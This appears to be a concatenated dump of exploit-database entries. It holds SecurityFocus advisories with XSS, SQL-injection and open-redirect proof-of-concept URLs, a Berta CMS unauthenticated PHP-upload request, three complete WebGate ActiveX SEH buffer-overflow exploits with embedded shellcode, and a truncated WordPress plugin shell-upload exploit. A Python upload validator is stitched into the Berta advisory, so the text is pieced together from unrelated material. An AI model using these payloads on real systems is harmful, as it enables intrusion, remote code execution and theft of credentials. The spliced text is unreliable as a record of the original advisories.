
source: https://www.securityfocus.com/bid/51321/info

ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time 
            
source: https://www.securityfocus.com/bid/51317/info
 
Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/pageE.php?id=118+order+by+10-- 
            
source: https://www.securityfocus.com/bid/51418/info

PHP Ringtone Website is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss] 
            
source: https://www.securityfocus.com/bid/51416/info

PHP Membership Site Manager Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PHP Membership Site Manager Script version 2.1 and prior are vulnerable.

http://www.example.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss] 
            
source: https://www.securityfocus.com/bid/51411/info

The HD Video Share ('com_contushdvideoshare') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

HD Video Share 1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14
http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14â??a 
            
source: https://www.securityfocus.com/bid/51404/info

Contus Job Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16â??A 
            
source: https://www.securityfocus.com/bid/51401/info

MailEnable is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

The following MailEnable versions are vulnerable:
Professional, Enterprise, and Premium 4.26 and prior versions
Professional, Enterprise, and Premium 5.52 and prior versions
Professional, Enterprise, and Premium 6.02 and prior versions 

http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username=[xss] 
            
source: https://www.securityfocus.com/bid/51393/info

GreenBrowser is prone to a remote use-after-free memory-corruption vulnerability.

Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions.

GreenBrowser 6.0.1002 and prior versions are vulnerable. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36546.rar
            
source: https://www.securityfocus.com/bid/51389/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.

NOTE: This issue affects Linux kernels running as guest images. 

[bits 32]
global _start
SECTION .text
_start: syscall 
            
source: https://www.securityfocus.com/bid/51373/info

KnowledgeTree is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

KnowledgeTree 3.7.0.2 is vulnerable; prior versions may also be affected. 

http://www.example.com/login.php/%22onmouseover=alert%28document.cookie%29;%3E
http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E
http://www.example.com/preferences.php/%22onmouseover=alert%28document.cookie%29;%3E
            
source: https://www.securityfocus.com/bid/51377/info

Kayako SupportSuite is prone to the following vulnerabilities:

1. Multiple HTML-injection vulnerabilities.
2. A remote code-execution vulnerability.
3. Multiple cross-site scripting vulnerabilities.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.

Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable. 

Remote code-execution:
http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register

Cross-site scripting:
http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9

http://www.example.com/support/staff/index.php?_m=news&_a=managenews

http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories

http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles

http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]

http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking

http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses

http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts

http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters 
            
source: https://www.securityfocus.com/bid/51367/info

ExpressView Browser Plug-in is prone to multiple integer overflow and remote code-execution vulnerabilities.

Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.

ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36542.zip
            
source: https://www.securityfocus.com/bid/51365/info

PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PHP-Fusion 7.02.04 is vulnerable; other versions may also be affected. 

http://www.example.com/[Path]/downloads.php?cat_id=[Xss] 
            
source: https://www.securityfocus.com/bid/51357/info

WordPress Age Verification plugin is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

WordPress Age Verification plugin 0.4 and prior versions are vulnerable. 

http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com 
            
source: https://www.securityfocus.com/bid/51339/info

Advanced File Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Advanced File Management 1.4 is vulnerable; other versions may also be affected. 

http://www.example.com/users.php?page=[xss] 
            
source: https://www.securityfocus.com/bid/51338/info

Gregarius is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Gregarius versions 0.6.1 and prior are vulnerable. 

http://www.example.com/?page=1[it'shere]&media=rss&
http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8[it'shere xss with sql]
http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E 
            
source: https://www.securityfocus.com/bid/51337/info

SonicWall AntiSpam & EMail is prone to a cross-site scripting vulnerability, a URI-redirection vulnerability, and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or conduct phishing attacks. Other attacks are also possible.

AntiSpam & EMail 7.3.1 is vulnerable; other versions may also be affected. 

http://www.example.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C*

http://www.example.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction= 
            
source: https://www.securityfocus.com/bid/51317/info

Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/gallery_e.php?id=118+order+by+10-- 
            
Berta CMS is a web based content management system using PHP and local file storage.

http://www.berta.me/

After a third-party Berta CMS website was used to redirect links within a phishing email that was brought to our attention, we checked the file upload functionality of this software.

We found that the file upload didn't require authentication.

Images with a ".php" extension could be uploaded, and all that was required was that they pass the PHP getimagesize() function and have suitable dimensions.

It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.

http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/

We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.
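The getimagesize() weakness described above, as an added example that is not part of the original advisory or of Berta CMS: a Python validator contrasting the dimension-only check with a stricter one (the constructed sample GIF, the function names, the extension allow-list and the size limits are assumptions made here).

```python
"""Added example: why a getimagesize()-style dimension check is not a
sufficient upload filter, and what a stricter validator looks like."""
import re
import struct

# Constructed sample: a syntactically valid 2x2 GIF89a (header, logical screen
# descriptor, image descriptor, minimal LZW data, trailer).
CLEAN_GIF = (
    b"GIF89a" + struct.pack("<HH", 2, 2) + b"\x00\x00\x00"   # signature + LSD
    + b"\x2c" + struct.pack("<HHHH", 0, 0, 2, 2) + b"\x00"  # image descriptor
    + b"\x02\x02\x44\x01\x00"                              # minimal LZW block
    + b"\x3b"                                              # trailer
)
# The same image with a PHP tag appended after the trailer: a dimension-only
# check still accepts it, exactly the property the advisory describes.
POLYGLOT_GIF = CLEAN_GIF + b"<?php phpinfo(); ?>"

PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
ALLOWED_EXT = {"gif", "png", "jpg", "jpeg"}  # assumed allow-list


def gif_dimensions(data):
    """Mimic the part of getimagesize() a GIF passes: signature + width/height."""
    if len(data) < 10 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    return struct.unpack("<HH", data[6:10])


def dimension_only_check(filename, data, max_w=4096, max_h=4096):
    """The weak check: any parseable GIF with sane dimensions is accepted,
    regardless of the filename extension or of what follows the image."""
    dims = gif_dimensions(data)
    return dims is not None and 0 < dims[0] <= max_w and 0 < dims[1] <= max_h


def hardened_check(filename, data, authenticated, max_w=4096, max_h=4096):
    """Accept only if the caller is authenticated, the extension is on an image
    allow-list, the bytes parse as an image with sane dimensions, and no PHP
    open tag is embedded anywhere in the file. Returns (ok, reasons)."""
    reasons = []
    if not authenticated:
        reasons.append("unauthenticated upload")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        reasons.append("extension not allowed: %r" % ext)
    if not dimension_only_check(filename, data, max_w, max_h):
        reasons.append("not a GIF with acceptable dimensions")
    if PHP_TAG.search(data):
        reasons.append("embedded PHP tag")
    # Independently of this check, the upload directory should never be
    # configured to execute scripts.
    return (len(reasons) == 0, reasons)
```

Running hardened_check("c.php", POLYGLOT_GIF, authenticated=False) reports all three defects the advisory relies on, while the same bytes pass dimension_only_check.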

The author was notified: 2015-03-22
Author acknowledged: 2015-03-23
Patch released: 2015-03-26

The berta-0.8.10b.zip file from http://www.berta.me/download/ includes a fix that requires authentication to upload files.


This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).


The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.

POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
Content-Length: 1617

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php


-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------2147563051636691175750543802--




Simon Waters
            
<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com
http://darshanams.blogspot.com

# Exploit Title: WebGate eDVR Manager SiteName Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Version: eDVR Manager 2.6.4
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2098

WebGate eDVR Manager WESPPlayback.WESPPlaybackCtrl.1 SiteName Property Stack Buffer Overflow Remote Code Execution Vulnerability
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype  = "Property Let SiteName ( ByVal SiteSerialNumber As String ) As String"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='sname'>
</object>
<script>
var buff1= "";
var buff2= "PraveenD";
var nops = "";

for (i=0; i<128; i++)
{
	buff1 += "B";
}
var nseh = "\xeb\x08PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
	nops += "\x90";
}
//calc.exe payload
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(8000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
	buff2 += "A";
}

fbuff = buff1 + nseh + seh + nops + sc + buff2;
sname.SiteName(fbuff) = buff2;

</script>
</html>
            
<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com/
http://darshanams.blogspot.com

# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
# Version: Control Center 4.8.7
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2099

targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub GetThumbnail ( ByVal SiteSerialNumber As String ,  ByVal Channel As Integer ,  ByVal secTime As Long ,  ByVal miliTime As Integer )"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->

<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'>
</object>
<script>

var buff1 = "";
var arg2=1;
var arg3=1;
var arg4=1;
var nops = "";
var buff2 = "";

for (i=0;i<24; i++)
{
	buff1 += "B";
}

// jump over seh to shellcode
nseh = "\xeb\x08PD";
// pop pop ret
var seh = "\xa0\xf2\x07\x10";

for (i=0;i<80; i++)
{
	nops += "\x90";
}
//calc.exe payload
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";

for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
	buff2 += "A";
}

fbuff = buff1 + nseh + seh + nops + sc + buff2;
getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);

</script>
</html>
            
<html>
<title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title>
<!--
# Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
# Version: WinRDS 2.0.8
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2094

targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Vulnerable Product = WinRDS 2.0.8
Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'>
</object>
<script>

var buff1 = "";
var nops = "";
var buff2 = "";

for (i=0;i<128; i++)
{
	buff1 += "B";
}

nseh = "\xeb\x08PD";
//pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
	nops += "\x90";
}
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
	buff2 += "A";
}

fbuff = buff1 + nseh + seh + nops + sc + buff2;
ssac.StopSiteAllChannel(fbuff);

</script>
</html>
            
<?php
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://www.inboundio.com
#
###########################################
#
# [!] Description :
#
# WordPress plugin InBoundio Marketing v1.0 suffers from a file/shell upload vulnerability;
# a remote attacker can upload a file/shell/backdoor and execute commands.
#
####
# Lines (6... to 20) : csv_uploader.php
####
#
# ExpLO!T : 
# -------

$postData = array();
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)

$dz = curl_init();
